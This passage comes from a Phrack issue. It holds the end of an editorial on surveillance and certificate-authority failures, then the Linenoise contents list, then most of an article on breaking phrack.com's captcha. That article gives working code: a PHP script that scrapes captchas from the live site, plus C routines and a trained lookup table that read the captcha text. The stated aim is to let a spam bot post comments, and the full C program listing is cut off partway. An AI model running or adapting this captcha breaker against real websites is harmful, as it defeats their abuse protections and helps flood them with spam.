requirement in their owni [4]. The content mafia, considering every form of
|
|
creative and work output their property, has declared war on all internet
|
|
citizen. No matter if picture, song, movie or academic paper, you shall pay
|
|
for its consumption or be banned from the net [5]. That they are actually
|
|
trying to resist evolution [6] is of no concern to them.
|
|
|
|
In times like that, where your network traffic may go though more deep
|
|
packet inspection engines than observable hops in traceroute, the hacker
|
|
shall reconsider his ways of communication. It is no longer enough to
|
|
SSH/VPN into one of your boxes and jump into your screen sessions, as the
|
|
communication of that box is monitored as much as your home network
|
|
connection.
|
|
|
|
Global surveillance is no longer stuff from science fiction books, or
|
|
attributed only to the most powerful secret services in the world. It
|
|
becomes a requirement for most ISPs to stay in business. They can either
|
|
sell you, or they can sell their company, and you can bet that the later is
|
|
not an option they consider.
|
|
|
|
Besides, traffic patterns of the average internet user change. We are
|
|
approaching a time when the ordinary user will only emit HTTP traffic with
|
|
his daily activities, making it easy for anyone interested to single out
|
|
the more creative minds, just by the fact that they still use protocols
|
|
like SSH, OpenVPN and IRC with their unmistakable signatures. It is up to
|
|
us to come up with new and creative ways of using this internet before
|
|
packets get dropped based on their protocol characteristics and we find
|
|
ourselves limited to Google+ and Facebook.
|
|
|
|
At the same time, the additional protections we have come to rely on prove
|
|
to be as bad as we always thought they might be. When breaking into a
|
|
certificate authority is as easy as it was with DigiNotar [7], when the
|
|
database of Comodo [8] ends up in BitTorrents, we are facing bigger
|
|
challenges than ever before. There are various discussions all over the net
|
|
on how to deal with the mess that is our common PKI. From the IETF [9] to
|
|
nation states, everyone has their own ideas. When certificate authorities
|
|
are taken over by governments or forced to issue Sub-CA certificates to the
|
|
same [10], it's not a trust mechanism we shall rely on.
|
|
|
|
An attitude that this is someone else's problem doesn't help. As more and
|
|
more functions of daily life move online, everyone is exposed to these
|
|
problems. Even if you know how to spot certificate changes, you will still
|
|
need to access the web site. HTTPS doesn't provide a plan B option. The CA
|
|
nightmare calls for the gifted and smart people to work together and find a
|
|
long term dependable solution. This is the time where your talent, skills
|
|
and experience is required, unless you are fine with government and vendor
|
|
driven committees to "solve" it.
|
|
|
|
Meanwhile over at IRC's little pre-teen sister Twitter, whose attention
|
|
span is shorter than that of a fruit fly and easily bought, people hype
|
|
so-called solutions [11] to the problem without doubts. Although their
|
|
heros abandon privacy solutions people depend on the moment someone waves a
|
|
little money in their face [12], the masses rather believe in a savior than
|
|
to think and evaluate for themselves. Are you one of them?
|
|
|
|
Unquestioned believe becomes the new normal. Whether it is Google or Apple
|
|
fanboyism, the companies can do whatever they want. Apple ships products
|
|
with several year old vulnerabilities [13] in open source components they
|
|
reused and nobody notices. Everyone can make X.509 certificates that iPhone
|
|
and iPad will happily accept [14]? No problem. Think back and consider the
|
|
shit storm if that would have been Microsoft. These companies feel so
|
|
invincible that Apple's App Store Guidelines [15] openly state: "If you run
|
|
to the press and trash us, it never helps."
|
|
Critical thinking seems to become a challenge when you get what you want.
|
|
Just look at how many hackers use Gmail without any end-to-end encryption,
|
|
because it just works. Thich hacker using a hotmail email address was ever
|
|
taken serious? Where is the difference?
|
|
|
|
What Apple and Google are for the hip generation, Symantec is for
|
|
governments and corporations. They are seen as the one company that will
|
|
protect us all. When the source code of PCAnywhere is leaked [16] and the
|
|
same company simply advises its users to no longer use that software
|
|
product [16], you get an idea of how they evaluate the security of it
|
|
themselves. And what about all the systems in daily life that depend on it?
|
|
If nobody used PCAnywhere, Symantec would have stopped selling it long ago.
|
|
Therefore, they simply left a large user base out in the cold. And what
|
|
happens? Nothing. Except, maybe, that some have fun with various remote
|
|
access points.
|
|
|
|
It all comes down to knowledge. Knowledge cannot be obtained by believe.
|
|
Believe is a really bad substitute for actually knowing. And what is the
|
|
hacker community other than first and foremost the quest for knowledge that
|
|
you found out yourself by critically questioning everything put in front of
|
|
you. What you do with that knowledge is a question everyone has to answer
|
|
himself. But if we stop to learn, experiment and play, we stop being
|
|
hackers and become part of the masses. It is a sign of the times when only
|
|
very few hackers speak IPv6, leave alone use it. When you see more fuzzers
|
|
written than lines of code actually read, because coding up a simple
|
|
trash-generator is so much easier than actually understanding what the code
|
|
does and then precisely exploiting it.
|
|
|
|
The quest for knowledge defines us, not money or fame. Let's keep it up!
|
|
|
|
|
|
[1] https://en.wikipedia.org/wiki/Arab_spring
|
|
[2] https://en.wikipedia.org/wiki/2011%E2%80%932012_Syrian_uprising
|
|
[3] http://buggedplanet.info/index.php?title=EG
|
|
[4] https://en.wikipedia.org/wiki/Telecommunications_data_retention
|
|
[5] https://en.wikipedia.org/wiki/Three_strikes_%28policy%29
|
|
[6] http://www.wired.com/threatlevel/2012/02/peter-sunde/
|
|
[7] https://en.wikipedia.org/wiki/DigiNotar
|
|
[8] https://en.wikipedia.org/wiki/Comodo_Group#Breach_of_security
|
|
[9] http://www.ietf.org/mail-archive/web/therightkey/current/maillist.html
|
|
[10] https://bugzilla.mozilla.org/show_bug.cgi?id=724929
|
|
[11] https://en.wikipedia.org/wiki/Convergence_%28SSL%29
|
|
[12] https://en.wikipedia.org/wiki/Whisper_Systems#Acquisition_by_Twitter
|
|
[13] http://support.apple.com/kb/HT5005
|
|
[14] http://support.apple.com/kb/HT4824
|
|
[15] https://developer.apple.com/appstore/guidelines.html
|
|
[16] http://resources.infosecinstitute.com/pcanywhere-leaked-source-code/
|
|
[17] http://www.symantec.com/connect/sites/default/files/pcAnywhere
|
|
%20Security%20Recommendations%20WP_01_23_Final.pdf
|
|
|
|
|
|
[ EOF ]
|
|
|
|
==Phrack Inc.==
|
|
|
|
Volume 0x0e, Issue 0x44, Phile #0x04 of 0x13
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-----------------------=[ L I N E N O I S E ]=-----------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|=-------------------------=[ various ]=-------------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
|
|
Linenoise iz back! The last one was in Issue 0x3f (2005 ffs) and since we
|
|
had great short and sweet submissions we thought it was about time to
|
|
resurrect it. After all, "a strong linenoise is key" ;-)
|
|
|
|
So, dear hacker, enjoy a strong Linenoise.
|
|
|
|
|
|
--[ Contents
|
|
|
|
1 - Spamming PHRACK for fun and profit -- darkjoker
|
|
2 - The Dangers of Anonymous Email -- DangerMouse
|
|
3 - Captchas Round 2 -- PHRACK PHP
|
|
CoderZ Team
|
|
4 - XSS Using NBNS on a Home Router -- Simon Weber
|
|
5 - Hacking the Second Life Viewer For Fun and Profit -- Eva
|
|
6 - How I misunderstood digital radio -- M.Laphroaig
|
|
|
|
|
|
|=[ 0x01 ]=---=[ Spamming PHRACK for fun & profit - darkjoker ]=---------=|
|
|
|
|
In this paper I'd like to explain how a captcha can be bypassed without
|
|
problems with just a few lines of C. First of all we'll pick a captcha to
|
|
bypass, and, of course, is there any better captcha than the one of this
|
|
site? Of course not, so we'll take it as example. You may have noticed
|
|
that there are many different spam messages in the comments of the
|
|
articles, which means that probably someone else has already bypassed the
|
|
captcha but, instead of writing an article about it, decided to spend his
|
|
time posting spam all around the site. Well, I hope that this article will
|
|
also be taken into account to make the decision to change captcha, because
|
|
this one is really weak.
|
|
|
|
First of all we're going to download some captchas, so that we'll be able
|
|
to teach our bot how to recognise a random captcha. In order to download
|
|
some captchas i've written this PHP code:
|
|
|
|
<?php
|
|
mkdir ("images");
|
|
for ($i=0;$i<200;$i++)
|
|
file_put_contents ("images/{$i}.jpg",file_get_contents
|
|
("http://www.phrack.com/captcha.php"));
|
|
?>
|
|
|
|
We're downloading 200 captchas, which should be enought. Ok, once we'll
|
|
have downloaded all the images we can proceed, cleaning the images (which
|
|
means we're going to remove the "noise". In these captchas the noise is
|
|
just made of some pixel of a lighter blue than the one used to draw the
|
|
letters. Well, it's kind of a mess to work with JPEG images, so we'll
|
|
convert all the images in PPM, which will make our work easier.
|
|
|
|
Luckily under Linux there's a command which makes the conversion really
|
|
easy and we won't need to do it manually:
|
|
|
|
convert -compress None input.jpg output.ppm
|
|
|
|
Let's do it for every image we have:
|
|
|
|
<?php
|
|
mkdir ("ppm");
|
|
for ($i=0;$i<200;$i++)
|
|
system ("convert -compress None images/{$i}.jpg ppm/{$i}.ppm");
|
|
?>
|
|
|
|
Perfect, now we have everything we need to proceed. Now, as I said
|
|
earlier, we've to remove the noise. That's a function which will load an
|
|
image and then removes the noise:
|
|
|
|
void load_image (int v) {
|
|
char img[32],line[1024];
|
|
int n,i,d,k,l,s;
|
|
FILE *fp;
|
|
sprintf (img, "ppm/%d.ppm",v);
|
|
fp = fopen (img, "r");
|
|
do
|
|
fgets (line, sizeof(line),fp);
|
|
while (strcmp (line, "255\n"));
|
|
i=0;
|
|
d=0;
|
|
k=0;
|
|
int cnt=0;
|
|
while (i!=40) {
|
|
fscanf (fp,"%d",&n);
|
|
captcha[i][d][k]=(char)n;
|
|
k++;
|
|
if (k==3) {
|
|
k=0;
|
|
if (d<119)
|
|
d++;
|
|
else {
|
|
i++;
|
|
d=0;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
Ok, this piece of code will load an image into 'captcha', which is a 3
|
|
dimensional array (rows*cols*3 bytes per color). Once the array is loaded,
|
|
using clear_noise () (written below) the noise will be removed.
|
|
|
|
void clear_noise () {
|
|
int i,d,k,t,ti,td;
|
|
char n[3];
|
|
/* The borders are always white */
|
|
for (i=0;i<40;i++)
|
|
for (k=0;k<3;k++) {
|
|
captcha[i][0][k]=255;
|
|
captcha[i][119][k]=255;
|
|
}
|
|
for (d=0;d<120;d++)
|
|
for (k=0;k<3;k++) {
|
|
captcha[0][d][k]=255;
|
|
captcha[39][d][k]=255;
|
|
}
|
|
/* Starts removing the noise */
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
|
|
captcha[i][d][2]>__COL)
|
|
for (k=0;k<3;k++)
|
|
captcha[i][d][k]=255;
|
|
for (i=1;i<39;i++) {
|
|
for (d=1;d<119;d++) {
|
|
for (k=0,t=0;k<3;k++)
|
|
if (captcha[i][d][k]!=255)
|
|
t=1;
|
|
if (t) {
|
|
ti=i-1;
|
|
td=d-1;
|
|
for (k=0,t=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td=d-1;
|
|
ti=i;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td+=2;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td=d-1;
|
|
ti=i+1;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
if (t/3<=__MIN)
|
|
for (k=0;k<3;k++)
|
|
captcha[i][d][k]=255;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
Well, what does this function do? It's really easy, first of all it clears
|
|
all the borders (because we know by looking at the downloaded images that
|
|
the borders never contain any character). Once the borders are cleaned,
|
|
the second part of the routine will remove all the light blue pixels,
|
|
turning them into white pixels. This way we'll obtain an almost perfect
|
|
image. The only issue is that there are some pixels which are as dark as
|
|
the ones which composes the characters, so we can't remove them with the
|
|
method explained above, we'll have to create something new. My idea was to
|
|
"delete" all the pixels which have no blue pixels near them, so that the
|
|
few blue pixels which doesn't compose the letters will be deleted. In
|
|
order to make the image cleaner I decided to delete all the pixels which
|
|
doesn't have at least 3 pixels near them. You may have noticed that __COL
|
|
and __MIN are not defined in the source above, these are two numbers:
|
|
|
|
#define __COL 0x50
|
|
#define __MIN 4*3
|
|
|
|
__COL is a number I used when I delete all the light blue pixels, I use it
|
|
in this line:
|
|
|
|
if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
|
|
captcha[i][d][2]>__COL)
|
|
|
|
In a few words, if the pixel is lighter than #505050 then it will be
|
|
deleted (turned white). __MIN is the minimum number of conterminous pixels
|
|
under which the pixel is deleted. The values where obtained after a few
|
|
attempts.
|
|
|
|
Perfect, now we have a piece of code which loads and clears a captcha. Our
|
|
next goal is to split the characters so that we'll be able to recognise
|
|
each of them. Before doing all this work we'd better start working with 2
|
|
dimensional arrays, it'll make our work easier, so I've written some lines
|
|
which makes this happen:
|
|
|
|
void make_bw () {
|
|
int i,d;
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
if (captcha[i][d][0]!=255)
|
|
bw[i][d]=1;
|
|
else
|
|
bw[i][d]=0;
|
|
}
|
|
|
|
This simply transforms the image in a black and white one, so that we can
|
|
use a 2 dimensional array. Now we can proceed splitting the letters.
|
|
In order to get the letters divided we are supposed to obtain two pixels
|
|
whose coordinates are the ones of the upper left corner and the lower right
|
|
corner. Once we have the coordinates of these two corners we'll be able to
|
|
cut a rectangle which contains a character.
|
|
|
|
Well, we're going to begin scanning the image from the left to the right,
|
|
column by column, and every time we'll find a black pixels in a column
|
|
which is preceded by an entire-white column, we'll know that in that column
|
|
a new character begins, while when we'll find an entire-white column
|
|
preceded by a column which contains at least one black pixel we'll know
|
|
that a character ends there.
|
|
|
|
Now, after this procedure is done we should have 12 different numbers which
|
|
represents the columns where each character begins and ends. The next step
|
|
is to find the rows where the letter begins and ends, so that we can obtain
|
|
the coordinates of the pixels we need. Let's call the column where the Xth
|
|
character begins CbX and the column where the Xth character ends CeX. Now
|
|
we'll start our scan from the top to the bottom of the image to find the
|
|
upper coordinate and from the bottom to the top to find the lower
|
|
coordinate.
|
|
|
|
This time, of course, the scan will be done six times using as limits the
|
|
columns where each character is contained between.
|
|
|
|
When the first row which contains a pixel is found (let's call this row
|
|
RbX) the same thing will be done to find the lower coordinate. The only
|
|
difference will be that the scan will begin from the bottom, that's done
|
|
this way because some characters (such as the 'j') are divided into two
|
|
parts, and if the scan was done only from the bottom to the end the result
|
|
would have been just a dot instead of the whole letter.
|
|
|
|
After having scanned the image from the bottom to the top we'll have
|
|
another row where the letter ends (or begins from the bottom), we'll call
|
|
this row ReX (of course we're talking about the Xth character).
|
|
|
|
Now we know which are the horizontal and vertical coordinates of the two
|
|
corners we're interested in (which are C1X(CbX,RbX) and C2X(CeX,ReX)), so
|
|
we can procede by filling a (CeX-CbX)*(ReX-RbX) matrix which will contain
|
|
the Xth character. Obviously the matrix will be filled with the bits of the
|
|
Xth character.
|
|
|
|
void scan () {
|
|
int i,d,k,j,c,coord[6][2][2];
|
|
for (d=0,j=0,c=0;d<120;d++) {
|
|
for (i=0,k=0;i<40;i++)
|
|
if (bw[i][d])
|
|
k=1;
|
|
if (k && !j) {
|
|
j=1;
|
|
coord[c][0][0]=d;
|
|
}
|
|
else if (!k && j) {
|
|
j=0;
|
|
coord[c++][0][1]=d;
|
|
}
|
|
}
|
|
for (c=0;c<6;c++) {
|
|
coord[c][1][0]=-1;
|
|
coord[c][1][1]=-1;
|
|
for (i=0;(i<40 && coord[c][1][0]==-1);i++)
|
|
for (d=coord[c][0][0];d<coord[c][0][1];d++)
|
|
if (bw[i][d]) {
|
|
coord[c][1][0]=i;
|
|
break;
|
|
}
|
|
for (i=39;(i>=0 && coord[c][1][1]==-1);i--)
|
|
for (d=coord[c][0][0];d<coord[c][0][1];d++)
|
|
if (bw[i][d]) {
|
|
coord[c][1][1]=i;
|
|
break;
|
|
}
|
|
for (i=coord[c][1][0],j=0;i<=coord[c][1][1];i++,j++)
|
|
for (d=coord[c][0][0],k=0;d<coord[c][0][1];d++,k++)
|
|
chars[c][j][k]=bw[i][d];
|
|
dim[c][0]=j;
|
|
dim[c][1]=k;
|
|
}
|
|
}
|
|
|
|
Ok, now, using this function we're going to obtain all the characters
|
|
splitted into an array of 2 dimension arrays. The next step will be the
|
|
most boring, because we're going to divide all the characters by hand, so
|
|
that the program, after our work, will be able to recognise all of them and
|
|
learn how each character is made. Before that, we need a new directory
|
|
which will contain all the characters. A simple 'mkdir chars' will do.
|
|
Now we have to fill the directory with the characters. Here's a main
|
|
function whose goal is to divide all the captchas into characters and put
|
|
them in the chars/ directory.
|
|
|
|
int main () {
|
|
int i,d,k,c,n;
|
|
FILE *x;
|
|
char path[32];
|
|
for (n=0,k=0;n<200;n++) {
|
|
load_image (n);
|
|
clear_noise ();
|
|
make_bw ();
|
|
scan ();
|
|
for (c=0;c<6;c++,k++) {
|
|
sprintf (path,"chars/%d.ppm",k);
|
|
x=fopen (path,"w");
|
|
fprintf (x,"P1\n#asdasd\n\n%d %d\n",dim[c][1],dim[c][0]);
|
|
for (i=0;i<dim[c][0];i++) {
|
|
for (d=0;d<dim[c][1];d++)
|
|
fprintf (x,"%d",chars[c][i][d]);
|
|
fprintf (x,"\n");
|
|
}
|
|
fclose (x);
|
|
}
|
|
}
|
|
return 0;
|
|
}
|
|
|
|
Very well, now the chars/ directory contains all the files we need. Now it
|
|
comes the part where the human is supposed to divide the characters in the
|
|
right directories. To make this work faster I've used a simple PHP script
|
|
which helps a little:
|
|
|
|
<?php
|
|
$in=fopen ("php://stdin","r");
|
|
mkdir ("c");
|
|
for ($i=0;$i<26;$i++)
|
|
mkdir ("c/".chr(ord('a')+$i));
|
|
for ($i=0;$i<10;$i++)
|
|
mkdir ("c/".chr(ord('0')+$i));
|
|
for ($i=54;$i<1200;$i++) {
|
|
echo $i.": ";
|
|
$a = trim(fgets ($in,1024));
|
|
if ($a!='.')
|
|
system ("cp chars/{$i}.ppm c/{$a}/{$i}.ppm");
|
|
}
|
|
fclose ($in);
|
|
?>
|
|
|
|
I think there's nothing to be explained, it's just a few lines of code.
|
|
After the script is runned and someone (me) enters all the data needed
|
|
we're going to have a c/ directory with some subdirectories in which there
|
|
are all the characters divided.
|
|
|
|
Some characters ('a','e','i','o','u','l','0','1') never appear, which means
|
|
that probably the author of the captcha decided not to include these
|
|
characters.
|
|
|
|
Anyway that's not a problem for us. Now, we should work out a way to make
|
|
our program recognise a character. My idea was to divide the image in 4
|
|
parts (horizontally), and then count the number of black (1) pixels in each
|
|
part, so that when we have an unknown character all our program will be
|
|
supposed to do is to count the number of black pixels for each part of the
|
|
image, and then search the character with the closest number of black
|
|
pixels. I've tried to do it but I haven't kept into account that some
|
|
characters (such as 'q' and 'p') have a similar number of pixels for each
|
|
part, even though they're completely different.
|
|
|
|
After having realised that, I decided to use 8 parts to divide each
|
|
character: 4 parts horizontally, then each part is divided in other 2 parts
|
|
vertically.
|
|
|
|
Well, of course there's no way I could have done that by hand, and in fact
|
|
I've written a PHP script:
|
|
|
|
<?php
|
|
error_reporting (E_ALL ^ E_NOTICE);
|
|
$f = array (4,2,4/3,1);
|
|
$arr=array ('b','c','d','f','g','h','j','k','m','n','p','q','r','s','t',
|
|
'v','w','x','y','z','2','3','4','5','6','7','8','9');
|
|
$h = array ();
|
|
for ($a=0;$a<count($arr);$a++) {
|
|
$i = $arr[$a];
|
|
$x = array ();
|
|
$files = scandir ("c/{$i}");
|
|
for ($d=0;$d<count($files);$d++) {
|
|
if ($files[$d][0]!='.') { // Excludes '.' and '..'
|
|
$lines=explode ("\n",file_get_contents ("c/{$i}/{$files[$d]}"));
|
|
for ($k=0;$k<4;$k++)
|
|
array_shift ($lines);
|
|
array_pop ($lines);
|
|
$j = count ($lines);
|
|
$k = strlen ($lines[0]);
|
|
$r=0;
|
|
$h[$a] += $j;
|
|
if ($files[$d]=="985.ppm") {
|
|
for ($n=0;$n<4;$n++)
|
|
for (;$r<floor ($j/$f[$n]);$r++) {
|
|
for ($l=0;$l<floor($k/2);$l++)
|
|
$x[$n][0]+=$lines[$r][$l];
|
|
for (;$l<floor($k);$l++)
|
|
$x[$n][1]+=$lines[$r][$l];
|
|
}
|
|
print_r ($x);
|
|
}
|
|
}
|
|
}
|
|
$h [$a] = round ($h[$a]/(count($files)-2));
|
|
for ($n=0;$n<4;$n++) {
|
|
$x[$n][0] = round ($x[$n][0]/(count($files)-2));
|
|
$x[$n][1] = round ($x[$n][1]/(count($files)-2));
|
|
}
|
|
printf ("$i => %02d %02d %02d %02d / %02d %02d %02d %02d\n",$x[0][0],
|
|
$x[1][0],$x[2][0],$x[3][0],$x[0][1],$x[1][1],$x[2][1],$x[3][1]);
|
|
}
|
|
for ($i=0;$i<count ($arr);$i++)
|
|
echo "{$h[$i]}, ";
|
|
|
|
?>
|
|
|
|
It works out the average number of black pixels for each part. Moreover it
|
|
also prints the average height of each character (I'm going to explain the
|
|
reason of this below).
|
|
|
|
A character such as a 'z' is divided this way:
|
|
|
|
01111 111110
|
|
11111 111111
|
|
11111 111111
|
|
01111 111111
|
|
|
|
00000 111110
|
|
00000 111110
|
|
00000 111100
|
|
00001 111100
|
|
|
|
00001 111000
|
|
00011 110000
|
|
00011 110000
|
|
00111 100000
|
|
|
|
00111 111110
|
|
01111 111111
|
|
01111 111111
|
|
00111 111110
|
|
|
|
So the numbers (of the black pixels) in this case will be:
|
|
|
|
18 23
|
|
1 18
|
|
8 8
|
|
14 22
|
|
|
|
Well, once taken all these numbers from each character the PHP script
|
|
written above works out the average numbers for each character. In the
|
|
'z', for example, the average numbers are:
|
|
|
|
18 20
|
|
3 15
|
|
11 7
|
|
17 20
|
|
|
|
Which are really close to the ones written above (at least, they're closer
|
|
than the ones of the other characters). Now the last step is to do the
|
|
comparison between the character of the captcha we want our program to read
|
|
and the numbers we've stored. To do so we first need to make the program
|
|
count the number of black pixels of a character, and save the numbers
|
|
somewhere so that it'll be possible to do the comparison. read_pixels ()'s
|
|
aim is exactly to do that, using the same method used above in the PHP
|
|
script.
|
|
|
|
void read_pixels (int c) {
|
|
int i,d,k,r;
|
|
float arr[]={4,2,1.333333,1};
|
|
memset (bpix,0,8*sizeof(int));
|
|
for (k=0,i=0;k<4;k++) {
|
|
for (;i<(int)(dim[c][0]/arr[k]);i++) {
|
|
for (d=0;d<dim[c][1]/2;d++)
|
|
bpix[k][0] += chars[c][i][d];
|
|
for (;d<dim[c][1];d++)
|
|
bpix[k][1] += chars[c][i][d];
|
|
}
|
|
}
|
|
}
|
|
|
|
The next step is to compare the numbers, that's what the cmp () function is
|
|
supposed to do:
|
|
|
|
char cmp (int c) {
|
|
int i,d;
|
|
int err,n,min,min_i;
|
|
read_pixels (c);
|
|
for (i=0,min=-1;i<28;i++) {
|
|
n=abs(heights[i]-dim[c][0])*__HGT;
|
|
for (d=0;d<4;d++) {
|
|
n += abs(bpix[d][0]-table[i][0][d]);
|
|
n += abs(bpix[d][1]-table[i][1][d]);
|
|
}
|
|
if (min>n || min<0) {
|
|
min=n;
|
|
min_i = i;
|
|
}
|
|
}
|
|
return ch_list[min_i];
|
|
}
|
|
|
|
'table' is an array in which all the average numbers worked out before are
|
|
stored. As you can see there's a final number (n) which is the sum of a
|
|
number obtain in this way:
|
|
|
|
n += |x-y)
|
|
|
|
Where 'x' is the number of black pixels of each part of the character we
|
|
want to read, while 'y' is the average number of the character we're
|
|
comparing the character we want to read with. The smaller the resulting
|
|
number is, the closer to that character. I firstly thought that the
|
|
algorithm I used would have been good enough, but I soon realised that
|
|
there were too many "misunderstandings" while the program was trying to
|
|
read some characters (such as the 'y's, which were usually read as 'v's).
|
|
So I decided to make the final number also influenced by the height of the
|
|
character, so that a 'v' and a 'y' (which have different heights) can't be
|
|
misunderstood.
|
|
|
|
Before this change the program couldn't recognise 17 characters out of
|
|
1200. Then, after some tests, I found that by adding the difference of the
|
|
heights times a costant, the results were better: 3 wrong characters out of
|
|
1200.
|
|
|
|
n = |x-y|*k
|
|
|
|
Where 'x' is the height of the character we want to read while 'y' is the
|
|
height of the character we're comparing the character we want to read
|
|
with.
|
|
|
|
The costant (k) was calculated by doing some attempts, and finally it was
|
|
given the value 1.5. Now everything's ready, the last function I've
|
|
written is read_captcha () which will return the captcha's string.
|
|
|
|
char *read_captcha (char *file) {
|
|
char *str;
|
|
int i;
|
|
str = malloc(7*sizeof(char));
|
|
load_image (file);
|
|
clear_noise ();
|
|
make_bw ();
|
|
scan ();
|
|
for (i=0;i<6;i++)
|
|
str[i]=cmp(i);
|
|
str[i]=0;
|
|
return str;
|
|
}
|
|
|
|
And.. Done :) Now we can make our program read a captcha without any
|
|
problem. Now I should be supposed to code an entire spam bot, but, since
|
|
it requires some tests I think it wouldn't be good to post random comments
|
|
all around phrack, so my article finishes here.
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
|
|
#define __COL 80
|
|
#define __MIN 4*3
|
|
#define __HGT 1.5
|
|
|
|
unsigned char captcha[40][120][3];
|
|
unsigned char bw[40][120];
|
|
unsigned char chars[6][40][30];
|
|
int dim[6][2];
|
|
int bpix[4][2];
|
|
int heights[] = {
|
|
23, 16, 23, 23, 22, 23, 29,
|
|
23, 16, 16, 22, 22, 16, 16,
|
|
20, 16, 16, 16, 21, 16, 23,
|
|
24, 23, 23, 23, 23, 24, 24 };
|
|
char ch_list [] = "bcdfghjkmnpqrstvwxyz23456789";
|
|
int table [28][2][4]= {
|
|
{ {18, 28, 26, 28}, { 0, 20, 25, 29}},
|
|
{ {10, 17, 17, 10}, {21, 1, 1, 20}},
|
|
{ { 0, 20, 25, 29}, {18, 31, 26, 31}},
|
|
{ {10, 24, 18, 17}, {23, 12, 6, 5}},
|
|
{ {21, 25, 20, 8}, {28, 25, 29, 27}},
|
|
{ {18, 28, 25, 22}, { 0, 20, 25, 22}},
|
|
{ { 1, 9, 0, 14}, {13, 27, 28, 25}},
|
|
{ {18, 24, 30, 22}, { 0, 15, 21, 23}},
|
|
{ {24, 21, 20, 17}, {21, 25, 24, 20}},
|
|
{ {17, 18, 16, 14}, {20, 17, 16, 14}},
|
|
{ {27, 25, 29, 22}, {24, 25, 25, 0}},
|
|
{ {25, 25, 24, 0}, {27, 25, 29, 22}},
|
|
{ {14, 16, 15, 13}, {19, 2, 0, 0}},
|
|
{ {15, 16, 2, 9}, {12, 4, 18, 17}},
|
|
{ {15, 20, 15, 12}, { 5, 10, 5, 19}},
|
|
{ {13, 17, 15, 11}, {14, 14, 14, 10}},
|
|
{ { 9, 17, 20, 13}, {12, 18, 22, 14}},
|
|
{ { 9, 11, 11, 13}, {12, 13, 13, 12}},
|
|
{ {15, 19, 14, 14}, {16, 20, 15, 9}},
|
|
{ {18, 3, 11, 17}, {20, 15, 7, 20}},
|
|
{ {21, 4, 8, 24}, {21, 26, 19, 24}},
|
|
{ {16, 0, 6, 24}, {29, 23, 25, 28}},
|
|
{ { 5, 12, 23, 5}, {23, 24, 32, 24}},
|
|
{ {23, 25, 10, 20}, {18, 12, 26, 23}},
|
|
{ { 3, 21, 28, 24}, {16, 15, 30, 27}},
|
|
{ {18, 1, 11, 20}, {27, 24, 14, 3}},
|
|
{ {25, 24, 26, 23}, {28, 26, 28, 28}},
|
|
{ {20, 27, 16, 16}, {25, 26, 28, 9}} };
|
|
|
|
void clear () {
|
|
int i,d,k;
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
for (k=0;k<3;k++)
|
|
captcha[i][d][k]=0;
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
bw[i][d]=0;
|
|
for (i=0;i<6;i++)
|
|
for (d=0;d<40;d++)
|
|
for (k=0;k<30;k++)
|
|
chars[i][d][k]=0;
|
|
for (i=0;i<6;i++)
|
|
for (d=0;d<2;d++)
|
|
dim[i][d]=0;
|
|
}
|
|
|
|
int numlen (int n) {
|
|
char x[16];
|
|
sprintf (x,"%d",n);
|
|
return strlen(x);
|
|
}
|
|
|
|
void load_image (char *img) {
|
|
char line[1024];
|
|
int n,i,d,k,l,s;
|
|
FILE *fp;
|
|
fp = fopen (img, "r");
|
|
do
|
|
fgets (line, sizeof(line),fp);
|
|
while (strcmp (line, "255\n"));
|
|
i=0;
|
|
d=0;
|
|
k=0;
|
|
int cnt=0;
|
|
while (i!=40) {
|
|
fscanf (fp,"%d",&n);
|
|
captcha[i][d][k]=(char)n;
|
|
k++;
|
|
if (k==3) {
|
|
k=0;
|
|
if (d<119)
|
|
d++;
|
|
else {
|
|
i++;
|
|
d=0;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
void clear_noise () {
|
|
int i,d,k,t,ti,td;
|
|
char n[3];
|
|
/* The borders are always white */
|
|
for (i=0;i<40;i++)
|
|
for (k=0;k<3;k++) {
|
|
captcha[i][0][k]=255;
|
|
captcha[i][119][k]=255;
|
|
}
|
|
for (d=0;d<120;d++)
|
|
for (k=0;k<3;k++) {
|
|
captcha[0][d][k]=255;
|
|
captcha[39][d][k]=255;
|
|
}
|
|
/* Starts removing the noise */
|
|
for (i=0;i<40;i++)
|
|
for (d=0;d<120;d++)
|
|
if (captcha[i][d][0]>__COL && captcha[i][d][1]>__COL &&
|
|
captcha[i][d][2]>__COL)
|
|
for (k=0;k<3;k++)
|
|
captcha[i][d][k]=255;
|
|
for (i=1;i<39;i++) {
|
|
for (d=1;d<119;d++) {
|
|
for (k=0,t=0;k<3;k++)
|
|
if (captcha[i][d][k]!=255)
|
|
t=1;
|
|
if (t) {
|
|
ti=i-1;
|
|
td=d-1;
|
|
for (k=0,t=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td++;
|
|
for (k=0;k<3;k++)
|
|
if (captcha[ti][td][k]!=255)
|
|
t++;
|
|
td=d-1;
|
|
ti=i;
|
|
